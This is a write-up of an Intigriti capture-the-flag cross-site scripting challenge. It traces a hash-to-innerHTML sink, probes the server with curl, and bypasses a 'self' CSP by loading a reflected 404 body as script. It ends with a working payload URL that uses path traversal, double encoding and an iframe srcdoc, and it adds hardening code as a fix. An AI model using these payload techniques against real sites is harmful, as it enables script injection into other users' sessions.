Solving Intigriti Challenge using… Content Injection!

The Challenge

Understanding the JavaScript

var hash = document.location.hash.substr(1);
if(hash){
displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
if(e.target.value != "")
displayReason(e.target.value);
}
function reasonLoaded () {
var reason = document.getElementById("reason");
reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
window.location.hash = reason;
var xhr = new XMLHttpRequest();
xhr.addEventListener("load", reasonLoaded);
xhr.open("GET",`./reasons/${reason}.txt`);
xhr.send();
}
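The two things to notice in that code are the source and the sink: the reason name comes straight from `location.hash`, is interpolated into a request path, and whatever the server sends back is run through `unescape()` and assigned to `innerHTML`. Below is an added example (my own hardened rewrite, not the challenge's code) that closes both ends: the name is checked against a strict pattern before it is used, the path is built with `encodeURIComponent`, and the reply is rendered with `textContent`. The `REASON_PATTERN`, `isSafeReason`, `reasonPath`, `decodesToMarkup` and `renderReason` names are mine, and the pattern assumes reason files have plain identifier names like `abba`.

```javascript
// Added example, not from the original write-up: a hardened version of the
// challenge's displayReason/reasonLoaded pair.

// Assumption: reason files are named with plain identifiers ("abba").
// Anything else (dots, slashes, percent signs, quotes, angle brackets)
// is rejected before it can reach the request path.
const REASON_PATTERN = /^[A-Za-z0-9_-]{1,64}$/;

function isSafeReason(reason) {
  return typeof reason === "string" && REASON_PATTERN.test(reason);
}

// Build the request path. Traversal and encoded characters never get here
// because isSafeReason() rejects them; encodeURIComponent() is defence in
// depth in case the pattern is ever loosened.
function reasonPath(reason) {
  if (!isSafeReason(reason)) {
    throw new Error("rejected reason: " + JSON.stringify(reason));
  }
  return "./reasons/" + encodeURIComponent(reason) + ".txt";
}

// Shows why unescape() in front of innerHTML is the sink: a reply that is
// inert as raw bytes turns into markup after the same unescape() call the
// challenge makes.
function decodesToMarkup(responseText) {
  const decoded = unescape(responseText);
  return decoded !== responseText && /[<>]/.test(decoded);
}

// Browser-only rendering path: textContent can never create elements or
// event handlers, whatever the server returned. Returns null outside a DOM.
function renderReason(status, responseText) {
  if (typeof document === "undefined") return null;
  const el = document.getElementById("reason");
  el.textContent = status === 200 ? responseText : "Reason not available.";
  return el.textContent;
}

// Drop-in replacement for the original displayReason(). Bad fragments are
// ignored instead of being written back into location.hash.
function displayReasonSafely(reason) {
  if (!isSafeReason(reason)) return;
  const xhr = new XMLHttpRequest();
  xhr.addEventListener("load", function () {
    renderReason(this.status, this.responseText);
  });
  xhr.open("GET", reasonPath(reason));
  xhr.send();
}

// Constructed sample inputs: one legitimate name, the two shapes seen in the
// write-up (angle brackets, traversal plus a double-encoded bracket), and a
// constructed percent-encoded reply body.
const sampleReasons = ["abba", "<abba.txt>", "../.ht%253ciframe"];
for (const r of sampleReasons) {
  console.log(JSON.stringify(r), "->", isSafeReason(r) ? reasonPath(r) : "rejected");
}
console.log("decodes to markup:", decodesToMarkup("%3Cb%3Ehi%3C%2Fb%3E")); // true
```

Running it under Node prints the first sample as `./reasons/abba.txt` and the other two as `rejected`; in a page, `displayReasonSafely` replaces both call sites of `displayReason`.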

The Chain

Phase 1: Content Injection

Anomalies

➜ curl -i https://challenge.intigriti.io/reasons/abba.txt
HTTP/2 200
x-powered-by: PHP/7.2.29
content-security-policy: default-src 'self'
content-type: text/html; charset=UTF-8
server: Google Frontend
content-length: 53
404 - 'File "abba.txt" was not found in this folder.'
➜ curl -i 'https://challenge.intigriti.io/reasons/<abba.txt>'
HTTP/2 200
x-powered-by: PHP/7.2.29
content-security-policy: default-src 'self'
content-type: text/html; charset=UTF-8
server: Google Frontend
content-length: 59
404 - 'File "_3Cabba.txt_3E" was not found in this folder.'
xhr.open("GET",`./reasons/${reason}.txt`);

Digging deeper

Read the source, Luke!

<p>You don't have permission to access /.htaccess% on this server.</p>

Phase 2: Bypassing the CSP

content-security-policy: default-src 'self'
<iframe srcdoc="<script src=X></script>"></iframe>
404 - 'File "a" was not found in this folder.'
^-- I could control this part
404 - 'File "'-alert(document.domain)-'" was not found in this folder.'
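Three server-side details make that 404 body usable as a script: it comes back with HTTP 200, it is served as `text/html` without `X-Content-Type-Options: nosniff`, and the requested name is echoed unescaped, so the whole body happens to parse as a JavaScript expression. `default-src 'self'` does nothing about it because the script is loaded from the same origin. The following is an added example (mine, not the challenge server's PHP) of a hardened 404 handler written as pure functions so it can be tested without a server; `legacy404` is a constructed model of the behaviour observed in the write-up, and `loadableAsScript` encodes the browser rules for when a `<script src>` response is actually executed. All function names are my own.

```javascript
// Added example, not the challenge server's code: a hardened 404 reply for
// the ./reasons/ endpoint, next to a constructed model of the original.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Constructed model of what the write-up observed: 200 status, text/html,
// no nosniff, filename reflected verbatim.
function legacy404(requestedName) {
  return {
    status: 200,
    headers: {
      "content-type": "text/html; charset=UTF-8",
      "content-security-policy": "default-src 'self'",
    },
    body: `404 - 'File "${requestedName}" was not found in this folder.'`,
  };
}

// Hardened reply: real 404 status, escaped filename, nosniff so the body is
// never sniffed into a script even if the content type is ever relaxed.
function build404(requestedName) {
  return {
    status: 404,
    headers: {
      "content-type": "text/html; charset=utf-8",
      "x-content-type-options": "nosniff",
      "content-security-policy": "default-src 'self'",
    },
    body: `404 - 'File "${escapeHtml(requestedName)}" was not found in this folder.'`,
  };
}

// Would a browser execute this reply when it is referenced from <script src>?
// Non-2xx responses are not run at all; with nosniff only JavaScript MIME
// types are run; without nosniff a text/html body is executed anyway.
const JS_MIME = /^(text|application)\/(javascript|ecmascript|x-javascript)\b/i;

function loadableAsScript(resp) {
  if (resp.status < 200 || resp.status > 299) return false;
  const ct = (resp.headers["content-type"] || "").toLowerCase();
  const nosniff = (resp.headers["x-content-type-options"] || "").toLowerCase() === "nosniff";
  return nosniff ? JS_MIME.test(ct) : true;
}

// Constructed sample names: the plain one from the write-up and one with
// the characters that made the original body parse as an expression.
for (const name of ["abba.txt", "<abba.txt>", "'-x-'"]) {
  const old = legacy404(name);
  const fixed = build404(name);
  console.log(JSON.stringify(name));
  console.log("  legacy body:", old.body, "| runs as script:", loadableAsScript(old));
  console.log("  fixed  body:", fixed.body, "| runs as script:", loadableAsScript(fixed));
}
```

The check in `loadableAsScript` is also a useful review question for any endpoint that reflects input: if a response is same-origin, 2xx, lacks `nosniff`, and its body can be made to parse as JavaScript, a `'self'` script policy will not stop it from being loaded.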

Final Solution

<iframe/srcdoc="<script/src=/'-alert(document.domain)-'></script>">
https://challenge.intigriti.io#../.ht%253ciframe/srcdoc=<script/src=/'-alert(document.domain)-'></script></iframe>

Amal Murali